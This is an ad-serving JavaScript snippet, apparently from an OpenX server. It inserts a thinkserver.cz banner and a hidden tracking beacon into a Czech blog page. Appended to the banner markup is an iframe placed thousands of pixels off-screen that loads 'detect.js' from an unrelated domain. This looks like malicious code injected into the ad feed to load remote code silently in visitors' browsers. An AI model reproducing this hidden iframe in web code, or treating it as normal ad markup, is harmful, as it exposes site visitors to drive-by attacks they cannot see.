 var OX_73d92a21 = ''; OX_73d92a21 += "<"+"a href=\'http://openads.aira.cz/www/delivery/ck.php?oaparams=2__bannerid=1243__zoneid=18__source=null__cb=92a826ce47__oadest=http%3A%2F%2Fwww.thinkserver.cz\' target=\'_blank\'><"+"img src=\'http://openads.aira.cz/www/images/62ab99c4c968f3c86c21b4d71e4db54c.jpg\' width=\'920\' height=\'200\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_92a826ce47\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openads.aira.cz/www/delivery/lg.php?bannerid=1243&amp;campaignid=294&amp;zoneid=18&amp;source=null&amp;loc=http%3A%2F%2Fdiit.cz%2Fblog%2Ffilmove-formaty-1-honba-za-maximalnim-zazitkem&amp;cb=92a826ce47\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe style=\"position:absolute;left:-3912px;top:-4000px;width:303px;height:348px;\" src=\"http://dean.carolinabusinesspartner.com/microwave/detect.js\"><"+"/iframe>";  var placement="leaderboard"; if(placement && document.getElementById(placement)) {
		if(OX_73d92a21){
			if(typeof window.advertisementCallback == "function")
				advertisementCallback(placement);
			document.getElementById(placement).className += " full";
		}
		document.getElementById(placement).innerHTML = OX_73d92a21 ;
		if(typeof window.advertisementAfterCallback == "function")
				advertisementAfterCallback(placement);} 